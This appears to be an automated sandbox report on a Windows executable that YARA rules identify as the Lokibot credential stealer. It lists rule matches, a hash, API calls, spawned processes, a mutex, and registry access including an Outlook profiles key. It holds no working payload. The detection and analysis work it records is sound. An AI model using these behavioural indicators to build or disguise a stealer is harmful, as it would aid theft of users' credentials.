              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404E07

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: U001P56ybm.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030E3
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_004060430_2_00406043
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_004046180_2_00404618
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_0040681A0_2_0040681A
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_100148440_2_10014844
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_1000C47B0_2_1000C47B
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10013D600_2_10013D60
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_1000C96F0_2_1000C96F
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_1000CD870_2_1000CD87
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_1000D1BC0_2_1000D1BC
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_1000F1CD0_2_1000F1CD
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_100169CC0_2_100169CC
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_1000D5F10_2_1000D5F1
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10015AB10_2_10015AB1
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_100142D20_2_100142D2
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_0040549C2_2_0040549C
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_004029D42_2_004029D4
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_0040549C2_1_0040549C
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_004029D42_1_004029D4
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: String function: 00404B22 appears 54 times
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: String function: 00412093 appears 40 times
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: String function: 0041219C appears 90 times
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: String function: 00405B6F appears 84 times
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: String function: 00404BEE appears 56 times
              Source: U001P56ybm.exe, 00000000.00000003.285538431.0000000002AA6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs U001P56ybm.exe
              Source: U001P56ybm.exe, 00000000.00000003.284071269.0000000002C3F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs U001P56ybm.exe
              Source: U001P56ybm.exeReversingLabs: Detection: 25%
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile read: C:\Users\user\Desktop\U001P56ybm.exeJump to behavior
              Source: U001P56ybm.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe"
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe"
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe" Jump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040650A
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_1_0040650A
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile created: C:\Users\user\AppData\Local\Temp\nsi3BDC.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@0/1
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,0_2_00402012
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040411B
              Source: C:\Users\user\Desktop\U001P56ybm.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
              Source: Binary string: wntdll.pdbUGP source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp

              Data Obfuscation:

              barindex
              Yara detected aPLib compressed binaryShow sources
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: U001P56ybm.exe PID: 4640, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: U001P56ybm.exe PID: 5684, type: MEMORYSTR
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10011705 push ecx; ret 0_2_10011718
